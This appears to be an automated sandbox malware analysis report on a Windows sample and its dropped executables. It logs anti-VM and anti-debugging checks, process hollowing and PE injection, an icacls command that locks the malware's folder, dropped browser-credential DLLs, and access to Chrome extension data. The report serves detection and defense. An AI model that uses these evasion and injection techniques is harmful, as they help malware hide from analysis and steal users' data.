Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: build2.exe PID: 7036, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_0459D71C rdtsc

0_2_0459D71C

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 4_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

4_2_00481920

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		1_2_0040E670
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		4_2_0040E670

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 968
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 9031

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmp4397.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp4397.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-39066

Source: C:\Users\user\Desktop\mJVVW85CnW.exe TID: 6960	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6196	Thread sleep count: 968 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6196	Thread sleep time: -217800s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6196	Thread sleep count: 9031 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6196	Thread sleep time: -2031975s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_0040F730
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_00410160
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	4_2_0040FB98

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mJVVW85CnW.exe, 00000004.00000003.1792646431.00000000097E2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: mJVVW85CnW.exe, 00000004.00000003.1799152040.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/04/2023 10:55:35.770OFFICECL (0x1988)0x75cTelemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 21, "Time": "2023-10-04T09:55:05Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: mJVVW85CnW.exe, 00000004.00000003.1794875046.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: mJVVW85CnW.exe, 00000004.00000003.1792646431.00000000097E2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: mJVVW85CnW.exe, 00000004.00000003.1802377770.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/04/2023 11:53:18.526OFFICECL (0x1db0)0x1dd4Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 17, "Time": "2023-10-04T10:52:48Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: mJVVW85CnW.exe, 00000001.00000002.1711552638.0000000000811000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000003.1704452444.0000000000811000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000668000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1726781034.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000912000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000888000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: mJVVW85CnW.exe, 00000004.00000003.1803270580.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/04/2023 11:57:12.660OFFICECL (0x648)0x1fe0Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 20, "Time": "2023-10-04T10:57:11Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareq
Source: mJVVW85CnW.exe, 00000004.00000003.1873217814.00000000031C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: <V V="VMWare, Inc." T="W" />
Source: mJVVW85CnW.exe, 00000004.00000003.1800256801.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/04/2023 11:52:10.031OFFICE~1 (0x1b38)0x1748Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:08Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: mJVVW85CnW.exe, 00000004.00000003.1801057478.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/04/2023 11:52:10.346OFFICE~1 (0x708)0x1044Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:10Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: mJVVW85CnW.exe, 00000004.00000003.1873217814.00000000031C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: <V V="QEMU" T="W" />
Source: mJVVW85CnW.exe, 00000004.00000003.2295064168.0000000003194000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Temporary Internet Files\Content.IE5\YLNGKWRH\dfb21df16475d4e5b2b0ba41e6c4e842c100b150[1].xml.bgzqeMusic_8wekyb3d8bbwe\SystemAppData\

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

API call chain: ExitProcess graph end node

graph_1-39068

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_0459D71C rdtsc

0_2_0459D71C

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_0040909D IsDebuggerPresent,

0_2_0040909D

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0042A57A

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

4_2_00481920

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

1_2_00412220

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_0459C0A3 push dword ptr fs:[00000030h]	0_2_0459C0A3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E30042 push dword ptr fs:[00000030h]	0_2_05E30042
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_0443C0A3 push dword ptr fs:[00000030h]	3_2_0443C0A3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF0042 push dword ptr fs:[00000030h]	3_2_05DF0042

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_00408568 GetProcessHeap,

0_2_00408568

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_00409028 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409028
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004329EC
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004329BB SetUnhandledExceptionFilter,	1_2_004329BB
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_004329EC
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_004329BB SetUnhandledExceptionFilter,	4_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_05E30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

0_2_05E30110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Memory written: C:\Users\user\Desktop\mJVVW85CnW.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Memory written: C:\Users\user\Desktop\mJVVW85CnW.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Memory written: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Memory written: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Memory written: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Memory written: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Memory written: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Section unmapped: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe base address: 400000

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

